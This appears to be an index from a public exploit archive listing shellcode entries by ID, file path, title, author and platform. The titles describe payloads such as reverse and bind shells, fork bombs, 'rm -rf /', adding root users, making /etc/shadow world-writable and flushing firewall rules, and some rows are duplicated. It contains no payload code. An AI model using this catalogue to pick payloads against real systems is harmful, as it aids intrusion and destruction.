42339,shellcodes/linux_x86-64/42339.c,"Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64
42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86
42485,shellcodes/linux_x86-64/42485.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64
42522,shellcodes/linux_x86-64/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
42523,shellcodes/linux_x86-64/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
42594,shellcodes/linux_x86/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",shellcode,linux_x86
42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42791,shellcodes/linux_x86-64/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64
42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86
42992,shellcodes/windows_x86-64/42992.c,"Windows x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64

1 id file description date author type platform
2 14113 shellcodes/arm/14113.txt Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes) 2010-06-29 Jonathan Salwan shellcode arm
3 13241 shellcodes/aix/13241.c AIX - execve /bin/sh Shellcode (88 bytes) 2004-09-26 Georgi Guninski shellcode aix
4 13242 shellcodes/bsd/13242.txt BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes) BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes) 2000-11-19 Scrippie shellcode bsd
5 13243 shellcodes/bsd_ppc/13243.c BSD/PPC - execve /bin/sh Shellcode (128 bytes) 2004-09-26 Palante shellcode bsd_ppc
6 13244 shellcodes/bsd_x86/13244.c BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes) 2006-07-20 Marco Ivaldi shellcode bsd_x86
7 13245 shellcodes/bsd_x86/13245.c BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes) BSD/x86 - setuid(0) + Bind TCP (31337/TCP) Shell Shellcode (94 bytes) 2006-07-20 Marco Ivaldi shellcode bsd_x86
8 13246 shellcodes/bsd_x86/13246.c BSD/x86 - execve /bin/sh Shellcode (27 bytes) 2004-09-26 n0gada shellcode bsd_x86
9 13247 shellcodes/bsd_x86/13247.c BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes) 2004-09-26 Matias Sedalo shellcode bsd_x86
10 13248 shellcodes/bsd_x86/13248.c BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes) BSD/x86 - Bind TCP (31337/TCP) Shell Shellcode (83 bytes) 2004-09-26 no1 shellcode bsd_x86
11 13249 shellcodes/bsd_x86/13249.c BSD/x86 - Bind TCP Shell (Random TCP Port) Shellcode (143 bytes) BSD/x86 - Bind TCP (Random TCP Port) Shell Shellcode (143 bytes) 2004-09-26 MayheM shellcode bsd_x86
12 13250 shellcodes/bsd_x86/13250.c BSD/x86 - Break chroot Shellcode (45 bytes) 2004-09-26 Matias Sedalo shellcode bsd_x86
13 13251 shellcodes/bsd_x86/13251.c BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes) 2004-09-26 dev0id shellcode bsd_x86
14 13252 shellcodes/bsd_x86/13252.c BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes) 2004-09-26 Matias Sedalo shellcode bsd_x86
15 13254 shellcodes/bsd_x86/13254.c BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes) BSD/x86 - Reverse TCP (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes) 2004-09-26 dev0id shellcode bsd_x86
16 13255 shellcodes/bsd_x86/13255.c BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes) 2004-09-26 Matias Sedalo shellcode bsd_x86
17 13256 shellcodes/bsd/13256.c BSD/x86 - Reverse TCP Shell (192.168.2.33:6969/TCP) Shellcode (129 bytes) BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes) 2004-09-26 Sinan Eren shellcode bsd
18 13257 shellcodes/bsdi_x86/13257.txt BSDi/x86 - execve /bin/sh Shellcode (45 bytes) 2004-09-26 duke shellcode bsdi_x86
19 13258 shellcodes/bsdi_x86/13258.txt BSDi/x86 - execve /bin/sh Shellcode (46 bytes) 2004-09-26 vade79 shellcode bsdi_x86
20 13260 shellcodes/bsdi_x86/13260.c BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes) 2004-09-26 anonymous shellcode bsdi_x86
21 13261 shellcodes/freebsd/13261.txt FreeBSD x86 / x64 - execve /bin/sh Anti-Debugging Shellcode (140 bytes) 2009-04-13 c0d3_z3r0 shellcode freebsd
22 13262 shellcodes/freebsd_x86/13262.txt FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes) 2008-09-12 suN8Hclf shellcode freebsd_x86
23 13263 shellcodes/freebsd_x86/13263.txt FreeBSD/x86 - Reverse TCP cat /etc/passwd (192.168.1.33:8000/TCP) Shellcode (112 bytes) FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes) 2008-09-10 suN8Hclf shellcode freebsd_x86
24 13264 shellcodes/freebsd_x86/13264.txt FreeBSD/x86 - Kill All Processes Shellcode (12 bytes) 2008-09-09 suN8Hclf shellcode freebsd_x86
25 13265 shellcodes/freebsd_x86/13265.c FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes) 2008-09-05 sm4x shellcode freebsd_x86
26 13266 shellcodes/freebsd_x86/13266.asm FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes) 2008-08-25 sm4x shellcode freebsd_x86
27 13267 shellcodes/freebsd_x86/13267.asm FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000/TCP) Null-Free Shellcode (89 bytes) FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes) 2008-08-21 sm4x shellcode freebsd_x86
28 13268 shellcodes/freebsd_x86/13268.asm FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes) 2008-08-21 sm4x shellcode freebsd_x86
29 13269 shellcodes/freebsd_x86/13269.c FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes) 2008-08-19 c0d3_z3r0 shellcode freebsd_x86
30 13270 shellcodes/freebsd_x86/13270.c FreeBSD/x86 - Bind TCP Password /bin/sh Shell (4883/TCP) Shellcode (222 bytes) FreeBSD/x86 - Bind TCP (4883/TCP) Shell (/bin/sh) + Password Shellcode (222 bytes) 2006-07-19 MahDelin shellcode freebsd_x86
31 13271 shellcodes/freebsd_x86/13271.c FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes) 2006-04-19 IZ shellcode freebsd_x86
32 13272 shellcodes/freebsd_x86/13272.c FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (1) 2006-04-14 IZ shellcode freebsd_x86
33 13273 shellcodes/freebsd_x86/13273.c FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (2) 2004-09-26 marcetam shellcode freebsd_x86
35 13275 shellcodes/freebsd_x86/13275.c FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes) 2004-09-26 dev0id shellcode freebsd_x86
36 13276 shellcodes/freebsd_x86/13276.c FreeBSD/x86 - chown 0:0 + chmod 6755 + execve /tmp/sh Shellcode (44 bytes) 2004-09-26 Claes Nyberg shellcode freebsd_x86
37 13277 shellcodes/freebsd_x86/13277.c FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes) 2004-09-26 Claes Nyberg shellcode freebsd_x86
38 13278 shellcodes/freebsd_x86/13278.asm FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (102 bytes) FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes) 2004-09-26 Scrippie shellcode freebsd_x86
39 13279 shellcodes/freebsd_x86-64/13279.c FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes) 2009-05-18 Hack'n Roll shellcode freebsd_x86-64
40 13280 shellcodes/freebsd_x86-64/13280.c FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes) 2009-05-15 c0d3_z3r0 shellcode freebsd_x86-64
41 13281 shellcodes/generator/13281.c Linux/x86 - execve Null-Free Shellcode (Generator) 2009-06-29 certaindeath shellcode generator
43 13283 shellcodes/generator/13283.php Windows XP SP1 - Bind TCP Shell Shellcode (Generator) 2009-06-09 Jonathan Salwan shellcode generator
44 13284 shellcodes/generator/13284.txt Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator) 2008-08-31 sorrow shellcode generator
45 13285 shellcodes/generator/13285.c Linux/x86 - Command Generator Null-Free Shellcode (Generator) 2008-08-19 BlackLight shellcode generator
46 13286 shellcodes/generator/13286.c Windows - Reverse TCP Shell (127.0.0.1:123/TCP) Alphanumeric Shellcode (Encoder/Decoder) (Generator) Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator) 2008-08-04 Avri Schneider shellcode generator
47 13288 shellcodes/generator/13288.c (Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes) 2006-10-22 izik shellcode generator
48 13289 shellcodes/generator/13289.c Windows x86 - Multi-Format Encoding Tool Shellcode (Generator) 2005-12-16 Skylined shellcode generator
49 13290 shellcodes/ios/13290.txt iOS Version-independent - Null-Free Shellcode 2008-08-21 Andy Davis shellcode ios
50 13291 shellcodes/hardware/13291.txt Cisco IOS - New TTY + Privilege Level To 15 + Reverse Virtual Terminal Shell (21/TCP) Shellcode Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode 2008-08-13 Gyan Chawdhary shellcode hardware
51 13292 shellcodes/hardware/13292.txt Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) 2008-08-13 Varun Uppal shellcode hardware
52 13293 shellcodes/hardware/13293.txt Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode 2008-08-13 Gyan Chawdhary shellcode hardware
53 13295 shellcodes/hp-ux/13295.txt HP-UX - execve /bin/sh Shellcode (58 bytes) 2004-09-26 K2 shellcode hp-ux
54 13296 shellcodes/linux_x86-64/13296.c Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes) 2008-11-28 gat3way shellcode linux_x86-64
55 13297 shellcodes/generator/13297.c Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator) Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator) 2006-04-21 phar shellcode generator
56 13298 shellcodes/linux_mips/13298.c Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes) Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes) 2008-08-18 vaicebine shellcode linux_mips
57 13299 shellcodes/linux_mips/13299.c Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes) 2008-08-18 vaicebine shellcode linux_mips
58 13300 shellcodes/linux_mips/13300.c Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes) 2005-11-09 core shellcode linux_mips
59 13301 shellcodes/linux_ppc/13301.c Linux/PPC - execve /bin/sh Shellcode (60 bytes) 2005-11-09 Charles Stevenson shellcode linux_ppc
60 13302 shellcodes/linux_ppc/13302.c Linux/PPC - read + exec Shellcode (32 bytes) 2005-11-09 Charles Stevenson shellcode linux_ppc
61 13303 shellcodes/linux_ppc/13303.c Linux/PPC - Reverse TCP /bin/sh Shell (192.168.1.1:31337/TCP) Shellcode (240 bytes) Linux/PPC - Reverse TCP (192.168.1.1:31337/TCP) Shell (/bin/sh) Shellcode (240 bytes) 2005-11-09 Charles Stevenson shellcode linux_ppc
62 13304 shellcodes/linux_ppc/13304.c Linux/PPC - execve /bin/sh Shellcode (112 bytes) 2004-09-12 Palante shellcode linux_ppc
63 13305 shellcodes/linux_sparc/13305.c Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes) Linux/SPARC - Reverse TCP (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes) 2004-09-26 killah shellcode linux_sparc
64 13306 shellcodes/linux_sparc/13306.c Linux/SPARC - Bind TCP Shell (8975/TCP) Null-Free Shellcode (284 bytes) Linux/SPARC - Bind TCP (8975/TCP) Shell + Null-Free Shellcode (284 bytes) 2004-09-12 killah shellcode linux_sparc
65 13307 shellcodes/linux_x86/13307.c Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes) 2009-09-15 XenoMuta shellcode linux_x86
66 13308 shellcodes/linux_x86/13308.c Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes) 2009-09-15 XenoMuta shellcode linux_x86
67 13309 shellcodes/linux_x86/13309.asm Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes) 2009-09-09 XenoMuta shellcode linux_x86
68 13310 shellcodes/linux_x86/13310.c Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes) 2009-08-26 Jonathan Salwan shellcode linux_x86
69 13311 shellcodes/linux_x86/13311.c Linux/x86 - killall5 Polymorphic Shellcode (61 bytes) 2009-08-11 Jonathan Salwan shellcode linux_x86
70 13312 shellcodes/linux_x86/13312.c Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes) 2009-08-11 Jonathan Salwan shellcode linux_x86
71 13313 shellcodes/linux_x86/13313.c Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) XOR Encoded Shellcode (152 bytes) Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + XOR Encoded Shellcode (152 bytes) 2009-07-10 Rick shellcode linux_x86
72 13314 shellcodes/linux_x86/13314.c Linux/x86 - reboot() Polymorphic Shellcode (57 bytes) 2009-06-29 Jonathan Salwan shellcode linux_x86
73 13315 shellcodes/linux_x86/13315.c Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes) 2009-06-22 Jonathan Salwan shellcode linux_x86
74 13316 shellcodes/linux_x86/13316.c Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes) 2009-06-16 blue9057 shellcode linux_x86
75 13317 shellcodes/linux_x86/13317.s Linux/x86 - Bind TCP Shell (8000/TCP) + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes) Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes) 2009-06-08 Jonathan Salwan shellcode linux_x86
76 13318 shellcodes/linux_x86/13318.s Linux/x86 - Bind TCP Shell (8000/TCP) + Add Root User Shellcode (225+ bytes) Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes) 2009-06-08 Jonathan Salwan shellcode linux_x86
77 13319 shellcodes/linux_x86/13319.s Linux/x86 - Bind TCP /bin/sh Shell (8000/TCP) Shellcode (179 bytes) Linux/x86 - Bind TCP (8000/TCP) Shell (/bin/sh) Shellcode (179 bytes) 2009-06-01 Jonathan Salwan shellcode linux_x86
78 13320 shellcodes/linux_x86-64/13320.c Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes) 2009-05-14 evil.xi4oyu shellcode linux_x86-64
79 13321 shellcodes/linux_x86/13321.c Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes) 2009-04-30 phar shellcode linux_x86
80 13322 shellcodes/linux_x86/13322.c Linux/x86 - File Unlinker Shellcode (18+ bytes) 2009-03-03 darkjoker shellcode linux_x86
94 13336 shellcodes/linux_x86/13336.c Linux/x86 - System Beep Shellcode (45 bytes) 2008-09-09 Thomas Rinsma shellcode linux_x86
95 13337 shellcodes/linux_x86/13337.c Linux/x86 - Reverse Connection (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes) 2008-08-25 militan shellcode linux_x86
96 13338 shellcodes/linux_x86/13338.c Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes) 2008-08-19 Reth shellcode linux_x86
97 13339 shellcodes/linux_x86/13339.asm Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes) Linux/x86 - Reverse TCP (8192/TCP) cat /etc/shadow Shellcode (155 bytes) 2008-08-18 0in shellcode linux_x86
98 13340 shellcodes/linux_x86/13340.c Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes) 2008-08-18 GS2008 shellcode linux_x86
99 13341 shellcodes/linux_x86/13341.c Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes) 2008-08-18 onionring shellcode linux_x86
100 13342 shellcodes/linux_x86/13342.c Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes) 2008-08-18 LiquidWorm shellcode linux_x86
101 13343 shellcodes/linux_x86/13343.asm Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes) Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes) 2007-04-02 mu-b shellcode linux_x86
102 13344 shellcodes/linux_x86/13344.c Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes) 2007-03-09 Kris Katterjohn shellcode linux_x86
103 13345 shellcodes/linux_x86/13345.c Linux/x86 - Kill All Processes Shellcode (11 bytes) 2007-03-09 Kris Katterjohn shellcode linux_x86
104 13346 shellcodes/linux_x86/13346.s Linux/x86 - execve read Shellcode (92 bytes) 2006-11-20 0ut0fbound shellcode linux_x86
115 13357 shellcodes/linux_x86/13357.c Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
116 13358 shellcodes/linux_x86/13358.c Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
117 13359 shellcodes/linux_x86/13359.c Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
118 13360 shellcodes/linux_x86/13360.c Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes) Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid Shellcode (96 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
119 13361 shellcodes/linux_x86/13361.c Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes) Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes) 2006-07-04 oveRet shellcode linux_x86
120 13362 shellcodes/linux_x86/13362.c Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes) 2006-05-14 BaCkSpAcE shellcode linux_x86
121 13363 shellcodes/linux_x86/13363.c Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes) Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes) 2006-05-08 Benjamin Orozco shellcode linux_x86
122 13364 shellcodes/generator/13364.c Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337/TCP) Shellcode (82 bytes) (Generator) Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator) 2006-05-08 Benjamin Orozco shellcode generator
123 13365 shellcodes/linux_x86/13365.c Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2) 2006-05-01 hophet shellcode linux_x86
124 13366 shellcodes/linux_x86/13366.txt Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes) Linux/x86 - Reverse TCP (127.0.0.1:80/TCP) Shell + XOR Encoded Shellcode (371 bytes) 2006-04-18 xort shellcode linux_x86
125 13367 shellcodes/linux_x86/13367.c Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes) 2006-04-17 izik shellcode linux_x86
126 13368 shellcodes/linux_x86/13368.c Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes) 2006-04-17 izik shellcode linux_x86
127 13369 shellcodes/linux_x86/13369.c Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes) 2006-04-17 izik shellcode linux_x86
128 13370 shellcodes/linux_x86/13370.c Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes) 2006-04-17 izik shellcode linux_x86
129 13371 shellcodes/linux_x86/13371.c Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes) 2006-04-16 Gotfault Security shellcode linux_x86
130 13372 shellcodes/linux_x86/13372.c Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes) 2006-04-16 Gotfault Security shellcode linux_x86
131 13373 shellcodes/linux_x86/13373.c Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes) Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) + Password (gotfault) Shellcode (166 bytes) 2006-04-06 Gotfault Security shellcode linux_x86
132 13374 shellcodes/linux_x86/13374.c Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes) Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (86 bytes) 2006-04-06 Gotfault Security shellcode linux_x86
133 13375 shellcodes/linux_x86/13375.c Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes) 2006-04-03 Gotfault Security shellcode linux_x86
134 13376 shellcodes/linux_x86/13376.c Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes) 2006-04-03 Gotfault Security shellcode linux_x86
135 13377 shellcodes/linux_x86/13377.c Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes) 2006-04-03 Gotfault Security shellcode linux_x86
142 13384 shellcodes/linux_x86/13384.c Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes) 2006-01-25 izik shellcode linux_x86
143 13385 shellcodes/linux_x86/13385.c Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes) 2006-01-21 izik shellcode linux_x86
144 13386 shellcodes/linux_x86/13386.c Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes) 2006-01-21 izik shellcode linux_x86
145 13387 shellcodes/linux_x86/13387.c Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes) Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes) 2006-01-21 izik shellcode linux_x86
146 13388 shellcodes/linux_x86/13388.c Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes) Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes) 2006-01-21 izik shellcode linux_x86
147 13389 shellcodes/linux_x86/13389.c Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes) 2006-01-21 izik shellcode linux_x86
148 13390 shellcodes/linux_x86/13390.c Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes) 2006-01-21 izik shellcode linux_x86
149 13391 shellcodes/linux_x86/13391.c Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes) 2006-01-21 izik shellcode linux_x86
150 13392 shellcodes/linux_x86/13392.c Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes) 2006-01-21 izik shellcode linux_x86
151 13393 shellcodes/linux_x86/13393.c Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes) Linux/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell Shellcode (74 bytes) 2006-01-21 izik shellcode linux_x86
152 13394 shellcodes/linux_x86/13394.c Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes) 2006-01-21 izik shellcode linux_x86
153 13395 shellcodes/linux_x86/13395.c Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes) 2006-01-21 izik shellcode linux_x86
154 13396 shellcodes/linux_x86/13396.c Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes) 2006-01-21 izik shellcode linux_x86
182 13424 shellcodes/linux_x86/13424.txt Linux/x86 - execve /bin/sh Alphanumeric Shellcode (392 bytes) 2004-09-26 RaiSe shellcode linux_x86
183 13425 shellcodes/linux_x86/13425.c Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes) 2004-09-26 anathema shellcode linux_x86
184 13426 shellcodes/linux_x86/13426.c Linux/x86 - symlink /bin/sh xoring Shellcode (56 bytes) 2004-09-26 dev0id shellcode linux_x86
185 13427 shellcodes/linux_x86/13427.c Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes) Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes) 2004-09-26 Tora shellcode linux_x86
186 13428 shellcodes/linux_x86/13428.c Linux/x86 - Add Root User (t00r) Anti-IDS Shellcode (116 bytes) 2004-09-26 Matias Sedalo shellcode linux_x86
187 13429 shellcodes/linux_x86/13429.c Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes) 2004-09-26 Matias Sedalo shellcode linux_x86
188 13430 shellcodes/linux_x86/13430.c Linux/x86 - symlink . /bin/sh Shellcode (32 bytes) 2004-09-26 dev0id shellcode linux_x86
191 13433 shellcodes/linux_x86/13433.c Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes) 2004-09-26 UnboundeD shellcode linux_x86
192 13434 shellcodes/linux_x86/13434.c Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes) 2004-09-26 dev0id shellcode linux_x86
193 13435 shellcodes/linux_x86/13435.c Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes) 2004-09-26 hts shellcode linux_x86
194 13436 shellcodes/linux_x86/13436.c Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes) Linux/x86 - Reverse TCP Shell (/bin/sh) Shellcode (120 bytes) 2004-09-26 lamagra shellcode linux_x86
195 13437 shellcodes/linux_x86/13437.c Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes) 2004-09-26 Matias Sedalo shellcode linux_x86
196 13438 shellcodes/linux_x86/13438.c Linux/x86 - cp /bin/sh /tmp/katy + chmod 4555 katy Shellcode (126 bytes) 2004-09-26 RaiSe shellcode linux_x86
197 13439 shellcodes/linux_x86/13439.c Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes) 2004-09-26 lamagra shellcode linux_x86
203 13445 shellcodes/linux_x86/13445.c Linux/x86 - execve /bin/sh Shellcode (38 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
204 13446 shellcodes/linux_x86/13446.c Linux/x86 - execve /bin/sh Shellcode (30 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
205 13447 shellcodes/linux_x86/13447.c Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes) 2004-09-12 anonymous shellcode linux_x86
206 13448 shellcodes/linux_x86/13448.c Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes) Linux/x86 - Bind TCP (5074/TCP) Shell Shellcode (92 bytes) 2004-09-12 Matias Sedalo shellcode linux_x86
